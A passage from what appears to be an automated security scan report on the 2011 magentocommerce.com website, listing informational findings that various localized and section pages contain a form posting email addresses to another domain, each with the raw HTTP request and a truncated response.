GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.42. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.43. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.44. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.45. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.46. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.47. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.48. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.49. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.50. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.51. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.52. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.53. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.54. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.55. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
